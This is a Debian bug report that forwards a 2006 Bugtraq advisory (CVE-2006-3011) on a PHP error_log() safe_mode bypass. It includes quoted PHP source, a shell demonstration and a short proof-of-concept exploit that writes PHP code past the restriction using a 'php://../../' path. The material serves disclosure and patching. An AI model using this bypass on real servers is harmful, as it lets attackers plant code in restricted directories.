Package: php4
Version: 4.4.2
Severity: grave
Justification: security

Hello

The following came through bugtraq, please check if we're affected.

bye,

-christian-

On Sun, Jun 25, 2006 at 11:11:34PM -0000, [EMAIL PROTECTED] wrote:
> [error_log() Safe Mode Bypass PHP 5.1.4 and 4.4.2]
>
> Author: Maksymilian Arciemowicz (cXIb8O3)
> Date:
> -Written: 10.6.2006
> -Public: 26.06.2006
> from SECURITYREASON.COM
> CVE-2006-3011
>
> --- 0.Description ---
> PHP is an HTML-embedded scripting language. Much of its syntax is borrowed
> from C, Java and Perl with a couple of unique PHP-specific features thrown
> in. The goal of the language is to allow web developers to write dynamically
> generated pages quickly.
>
> A nice introduction to PHP by Stig Sæther Bakken can be found at
> http://www.zend.com/zend/art/intro.php on the Zend website. Also, much of the
> PHP Conference Material is freely available.
> error_log -- Send an error message somewhere.
>
> --- 1. error_log() Safe Mode Bypass ---
> The error_log() function sends your error message to email or to a file, or
> displays it. You can send error messages by mail or write them into files.
> The issue is very simple. error_log() checks safe_mode and open_basedir in
> the stream function, but using a URL isn't allowed. And the problem exists
> in an incorrect filename.
>
> PHP5:
> -2013-2050---
> PHPAPI int _php_error_log(int opt_err, char *message, char *opt, char *headers TSRMLS_DC)
> {
>     php_stream *stream = NULL;
>
>     switch (opt_err) {
>
>         case 1:     /*send an email */
>             {
> #if HAVE_SENDMAIL
>                 if (!php_mail(opt, "PHP error_log message", message, headers, NULL TSRMLS_CC)) {
>                     return FAILURE;
>                 }
> #else
>                 php_error_docref(NULL TSRMLS_CC, E_WARNING, "Mail option not available!");
>                 return FAILURE;
> #endif
>             }
>             break;
>
>         case 2:     /*send to an address */
>             php_error_docref(NULL TSRMLS_CC, E_WARNING, "TCP/IP option not available!");
>             return FAILURE;
>             break;
>
>         case 3:     /*save to a file */
>             stream = php_stream_open_wrapper(opt, "a", IGNORE_URL | ENFORCE_SAFE_MODE | REPORT_ERRORS, NULL);
>             if (!stream)
>                 return FAILURE;
>             php_stream_write(stream, message, strlen(message));
>             php_stream_close(stream);
>             break;
>
>         default:
>             php_log_err(message TSRMLS_CC);
>             break;
>     }
>     return SUCCESS;
> }
> -2013-2050---
>
> Let's look at option 3.
>
> -2038 line---
> stream = php_stream_open_wrapper(opt, "a", IGNORE_URL | ENFORCE_SAFE_MODE | REPORT_ERRORS, NULL);
> -2038 line---
>
> Option "a" writes the error to the file, or creates a new file if it doesn't
> exist. The problem is that "IGNORE_URL" is passed to php_stream_open_wrapper().
> IGNORE_URL turns off safe_mode if you use "prefix://../../".
>
> -Example---
> cxib# php -r 'error_log("<? echo \"cx\"; ?>", 3, "/www/temp/sr.php");'
>
> Warning: error_log(): SAFE MODE Restriction in effect. The script whose uid
> is 0 is not allowed to access /www/temp owned by uid 80 in Command line code
> on line 1
>
> Warning: error_log(/www/temp/sr.php): failed to open stream: Invalid argument
> in Command line code on line 1
> cxib# php -r 'error_log("<? echo \"cx\"; ?>", 3, "php://../../www/temp/sr.php");'
> cxib# ls -la /www/temp/sr.php
> -rw-r--r-- 1 cxib www 16 Jun 11 17:47 /www/temp/sr.php
> cxib#
> -Example---
>
> --- 2. Exploit ---
> <?php
> $file=""; # FILENAME
> error_log("<? echo \"cx\"; ?>", 3, "php://../../".$file);
> ?>
>
>
> --- 3. How to fix ---
> No response from PHP Team. We reported this bug on 11.06.2006
>
> --- 4. Greets ---
>
> For: sp3x
> and
> p_e_a, l3x, pi3, eax, Infospec, gKPc8O3
>
> --- 5. Contact ---
> Author: SecurityReason.Com [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
> Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com
> GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
> SecurityReason.Com

-- 
Christian Hammers    WESTEND GmbH  |  Internet-Business-Provider
Technik              CISCO Systems Partner - Authorized Reseller
                     Lütticher Straße 10      Tel 0241/701333-11
[EMAIL PROTECTED]    D-52064 Aachen            Fax 0241/911879